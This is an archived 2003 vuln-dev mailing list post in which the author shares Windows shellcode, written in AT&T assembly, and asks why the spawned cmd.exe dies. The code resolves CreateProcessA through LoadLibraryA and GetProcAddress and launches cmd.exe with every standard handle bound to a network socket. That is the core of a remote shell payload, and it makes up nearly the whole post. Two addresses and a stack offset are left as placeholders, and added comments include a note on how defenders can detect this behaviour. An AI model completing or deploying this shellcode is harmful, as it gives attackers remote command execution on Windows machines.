Re: Windows reverse Shell
From: Berend-Jan Wever (skylined@edup.tudelft.nl)
Date: 02/05/03
Date: 5 Feb 2003 00:54:44 -0000 From: Berend-Jan Wever <skylined@edup.tudelft.nl> To: vuln-dev@securityfocus.com In-Reply-To: <00ef01c2cc6c$7fb7a030$a7db5cdb@sk4n>
I wrote a little piece of shellcode that should spawn a shell using a
socket in %ebp, which will execute cmd.exe successfully. The problem is
that cmd.exe dies right away. Has anybody got an idea why? The source
(asm for linux) is included.
Kind regards,
Berend-Jan Wever
# 32-bit Windows payload in GAS (AT&T) syntax, assembled on Linux.
# Flow: EntryPoint copies a socket handle from the stack into %ebp, main1
# builds STARTUPINFO and PROCESS_INFORMATION on the stack and calls
# CreateProcessA with hStdInput/hStdOutput/hStdError all set to that socket
# and bInheritHandles = 1.  The strings it needs are one ','-separated blob
# placed directly after the code ("cmd.exe,kernel32.dll,CreateProcessA,");
# each ',' is overwritten with a NUL as the string is consumed.
# Placeholders left by the author (not resolved on this page):
#   0xXXXXXX  - two values that, negated, point at something holding the
#               addresses of LoadLibraryA and GetProcAddress (presumably
#               import-table slots of the host process - confirm)
#   0xXX      - stack offset of the socket handle at EntryPoint
# Defender note: the observable behaviour is a cmd.exe child whose std
# handles are an inherited socket and whose parent is a network-facing
# process; process-creation telemetry that records parent image and
# inherited handles, and restricting outbound connections from service
# accounts, catch this irrespective of the byte pattern below.
Start:
#-----------------------------------------------------------------------
# MakeStringAndNegEbx
# In:    %edi = start of a ','-terminated string, %ebx = some value
# Out:   %edi = one past the ',' (start of the next string); the ',' is
#        turned into 0 in place (',' - ',' = 0); %ebx = -%ebx
# Clobb: %al, %ecx, flags.  scasb scans %es:(%edi) with %ecx = -1 as the
#        (effectively unbounded) count.
#-----------------------------------------------------------------------
MakeStringAndNegEbx:
mov $',', %al
xor %ecx, %ecx
dec %ecx
repne scasb # search for ','; leaves %edi one past it
sub %al, -1(%edi) # overwrite the ',' with 0 (terminator)
neg %ebx
ret
#-----------------------------------------------------------------------
# GetLibraryAndProcAddress
# In:    %edi -> "libName,procName,..."
# Out:   %eax = GetProcAddress(LoadLibraryA(libName), procName)
#        %edi advanced past procName
# Clobb: %ebx (set to the negated placeholder), %ecx, %al, flags, plus
#        whatever the two WINAPI callees clobber (stdcall: callee pops
#        the pushed arguments, so no stack fix-up after the calls).
#-----------------------------------------------------------------------
GetLibraryAndProcAddress: # {
push %edi # > libName
mov $-0xXXXXXX, %ebx # placeholder: -(address holding &LoadLibraryA)
call MakeStringAndNegEbx # put 0 after libName
call *(%ebx) # < LoadLibraryA(libName);
push %edi # > procName
push %eax # > libHandle
mov $-0xXXXXXX, %ebx # placeholder: -(address holding &GetProcAddress)
call MakeStringAndNegEbx # put 0 after ProcName
call *(%ebx) # << GetProcAddress(libHandle, procName);
ret
# }
#-----------------------------------------------------------------------
# main1
# In:    %ebp = socket handle; called from EntryPoint, so the return
#        address on the stack is End, where the string blob begins.
# Builds STARTUPINFO (0x44 bytes) and PROCESS_INFORMATION bottom-up with
# pushes, then pushes the ten CreateProcessA arguments right-to-left.
# Never returns: spins in InfinitLoop after CreateProcessA.
#-----------------------------------------------------------------------
main1:
# %ebp = socket
pop %edi # < %edi = &strings (the return address, i.e. End:)
# create a struct StartupInfo on the stack (fields pushed last-to-first).
xor %eax, %eax
push %ebp # HANDLE hStdError = socket
push %ebp # HANDLE hStdOutput = socket
push %ebp # HANDLE hStdInPut = socket
push %eax # LPBYTE lpReserved2 = NULL
inc %eax # WORD cbReserved2 = 0;
push %eax # WORD wShowWindow = 1; (one dword: low word wShowWindow, high word cbReserved2)
mov %al, %ah # 0x101
push %eax # DWORD dwFlags = STARTF_USESHOWWINDOW |
xor %eax, %eax # STARTF_USESTDHANDLES
push %eax # DWORD dwFillAttribute = 0
push %eax # DWORD dwYCountChars = 0
push %eax # DWORD dwXCountChars = 0
push %eax # DWORD dwYSize = 0
push %eax # DWORD dwXSize = 0
push %eax # DWORD dwY = 0
push %eax # DWORD dwX = 0
push %eax # LPTSTR lpTitle = NULL (program name)
push %eax # LPTSTR lpDesktop = NULL (inherit)
push %eax # LPTSTR lpReserved = NULL
mov $0x44, %al
push %eax # DWORD cb = 0x44 (length);
mov %esp, %esi # %esi = &StartupInfo
# create a struct ProcessInformation on the stack.
xor %eax, %eax
push %eax # HANDLE hProcess;
push %eax # HANDLE hThread;
push %eax # DWORD dwProcessId;
push %eax # DWORD dwThreadId;
# create a process with STD I/O handles hooked to socket.
push %esp # > lpProcessInformation -> stack
push %esi # > lpStartupInfo -> stack
push %eax # > lpCurrentDirecty: NULL
push %eax # > lpEnvironment: NULL
push %eax # > dwCreationFlags: 0
inc %eax
push %eax # > bInheritHandles: 1 (true) - lets the child use the socket
dec %eax
push %eax # > lpThreadAttributes: NULL
push %eax # > lpProcessAttributes: NULL
push %edi # > lpCommandLine: &('cmd.exe')
push %eax # > lpApplicationName: NULL
call MakeStringAndNegEbx # put 0 after commandline; %edi -> "kernel32.dll,..."
call GetLibraryAndProcAddress # LoadLibrary and GetProcAddress
call *%eax # <<<<<<<<<< CreateProcess(...); return value is not checked
InfinitLoop:
jmp InfinitLoop # wait forever (busy loop, burns CPU in the host thread).
#-----------------------------------------------------------------------
# EntryPoint
# Reads the socket handle from the stack at placeholder offset 0xXX and
# hands it to main1 in %ebp.  The call pushes End as the return address,
# which main1 pops as the start of the string blob.
#-----------------------------------------------------------------------
EntryPoint:
lea 0xXX(%esp), %eax # socket is on the stack at XX (placeholder)
mov (%eax), %ebp # socket
call main1
End:
The code is followed by this string:
"cmd.exe,kernel32.dll,CreateProcessA,"